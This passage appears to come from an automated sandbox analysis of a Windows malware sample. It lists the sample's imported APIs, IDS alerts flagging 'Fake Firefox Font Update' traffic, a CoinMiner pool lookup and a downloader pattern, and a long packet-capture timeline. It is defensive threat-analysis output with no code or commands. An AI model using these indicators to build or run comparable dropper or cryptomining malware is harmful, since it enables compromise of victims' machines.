                                                                                                                                                                                                                                    RT_GROUP_ICON0x27f6fd40x14data1.15
                                                                                                                                                                                                                                    RT_VERSION0x27f6fe80x2c8data0.46769662921348315
                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    kernel32.dllGetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                                                                                                                                                                                                                    kernel32.dllWriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                                                                                                                                                                                                                    shfolder.dllSHGetFolderPathA
                                                                                                                                                                                                                                    shell32.dllShellExecuteA
                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                    2024-12-28T22:20:09.749368+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970665.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:11.410883+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970865.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:13.426126+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54971013.226.4.166443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:16.405067+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54971265.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:19.772976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54971665.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:22.562655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54972013.226.4.166443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:26.326871+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54972665.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:28.816418+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54973713.226.4.166443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:32.211814+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54974365.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:34.892716+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54974913.226.4.166443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:38.184365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54975965.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:40.986490+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54976613.226.4.166443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:44.041813+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54977265.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:46.781988+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54977813.226.4.166443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:49.809690+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54978465.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:20:52.463831+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54979365.9.108.148443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:00.024648+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.5588671.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-28T22:21:14.267209+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54983865.9.108.93443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:18.184701+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54984965.9.108.93443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:31.158290+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54987318.66.161.123443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:36.603537+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54988765.9.108.93443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:38.521343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54989154.186.212.229443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:39.438945+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5498963.165.135.3443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:41.545301+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54990054.186.212.229443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:42.672007+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54990365.9.108.93443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:44.379806+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499102.16.168.105443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:45.353520+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499113.165.135.3443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:46.849187+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499132.16.168.105443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:47.479091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54991965.9.108.93443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:49.461500+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499213.165.135.3443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:50.311731+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54992254.186.212.229443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:52.482130+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499292.16.168.105443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:54.648806+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499362.16.168.105443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:57.367844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499422.16.168.105443TCP
                                                                                                                                                                                                                                    2024-12-28T22:21:58.545128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54994365.9.108.93443TCP
                                                                                                                                                                                                                                    2024-12-28T22:22:00.529844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499492.16.168.115443TCP
                                                                                                                                                                                                                                    2024-12-28T22:22:01.134398+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499513.165.135.3443TCP
                                                                                                                                                                                                                                    2024-12-28T22:22:03.811939+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499572.16.168.115443TCP
                                                                                                                                                                                                                                    2024-12-28T22:22:05.973078+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499642.16.168.115443TCP
                                                                                                                                                                                                                                    2024-12-28T22:22:08.446424+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54997154.186.212.229443TCP
                                                                                                                                                                                                                                    2024-12-28T22:22:10.667366+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5499812.16.168.115443TCP
                                                                                                                                                                                                                                    2024-12-28T22:22:25.620185+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550016104.20.94.94443TCP
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.332597971 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.332626104 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.332700968 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.408540964 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.408556938 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:04.681807995 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:04.681895018 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:04.685838938 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:04.685849905 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:04.686177015 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:04.753932953 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:04.795344114 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.123899937 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.123965979 CET44349704172.67.160.84192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.124188900 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.144629955 CET49704443192.168.2.5172.67.160.84
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.303652048 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.303693056 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.304044962 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.304558992 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.304574013 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.522849083 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.522936106 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.528413057 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.528434992 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.528816938 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.530735970 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.575336933 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988471031 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988540888 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988579035 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988596916 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988632917 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988672972 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988681078 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988742113 CET44349705104.21.85.189192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.988799095 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:06.995058060 CET49705443192.168.2.5104.21.85.189
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.084372997 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.084412098 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.084515095 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.085717916 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.085732937 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.322633982 CET4970780192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.442213058 CET8049707208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.442292929 CET4970780192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.442434072 CET4970780192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.561928988 CET8049707208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.749277115 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.749367952 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.751604080 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.751617908 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.751868010 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.803600073 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.839515924 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.839589119 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.839632988 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.648534060 CET8049707208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.795880079 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.795902967 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.795909882 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.795943022 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.795991898 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.795999050 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.796039104 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.820899010 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.820934057 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.821005106 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.821038008 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.821078062 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.821902990 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.821916103 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.821928024 CET49706443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.821932077 CET4434970665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.857687950 CET4970780192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.049164057 CET49708443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.049215078 CET4434970865.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.049426079 CET49708443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.049887896 CET49708443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.049897909 CET4434970865.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.223251104 CET4970780192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.267491102 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.410882950 CET49708443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.506608963 CET8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.506695032 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.507074118 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.507370949 CET8049707208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.507428885 CET4970780192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.626511097 CET8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.762845993 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.762904882 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.762989044 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.763598919 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.763617039 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:12.742219925 CET8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:12.882932901 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:12.921799898 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.426026106 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.426126003 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.432904959 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.432955027 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.433332920 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.434695959 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.434696913 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:13.434740067 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.457029104 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.457237005 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.457343102 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.463385105 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.463408947 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.463421106 CET49710443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.463428020 CET4434971013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.696188927 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.696225882 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.696449041 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.696774960 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:14.696793079 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:16.404933929 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:16.405066967 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:16.415040016 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:16.415088892 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:16.415340900 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:16.419049978 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:16.459342003 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.501636028 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.501661062 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.501674891 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.501749039 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.501780033 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.501831055 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.692795992 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.692822933 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.692890882 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.692934990 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.692950964 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.693007946 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731669903 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731713057 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731767893 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731802940 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731818914 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731843948 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731843948 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.731904984 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.759339094 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.759370089 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.759404898 CET49712443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:17.759412050 CET4434971265.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:18.053661108 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:18.053703070 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:18.053785086 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:18.054218054 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:18.054231882 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.772900105 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.772975922 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.774396896 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.774406910 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.774643898 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.782732964 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.782748938 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:19.782756090 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.892354965 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.892441034 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.892810106 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.900108099 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.900135040 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.900172949 CET49716443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.900181055 CET4434971665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.908565998 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.908613920 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.908723116 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.909524918 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:20.909543991 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.562516928 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.562654972 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.564274073 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.564290047 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.564549923 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.574142933 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.574513912 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:22.574523926 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:23.539978027 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:23.540059090 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:23.540122986 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:23.625860929 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:23.625890970 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:23.625906944 CET49720443192.168.2.513.226.4.166
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:23.625914097 CET4434972013.226.4.166192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:24.616842985 CET49726443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:24.616871119 CET4434972665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:24.616941929 CET49726443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:24.617409945 CET49726443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:24.617423058 CET4434972665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:26.326785088 CET4434972665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:26.326870918 CET49726443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:26.328156948 CET49726443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:26.328166962 CET4434972665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:26.328387976 CET4434972665.9.108.148192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:26.335330009 CET49726443192.168.2.565.9.108.148
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:26.335351944 CET49726443192.168.2.565.9.108.148
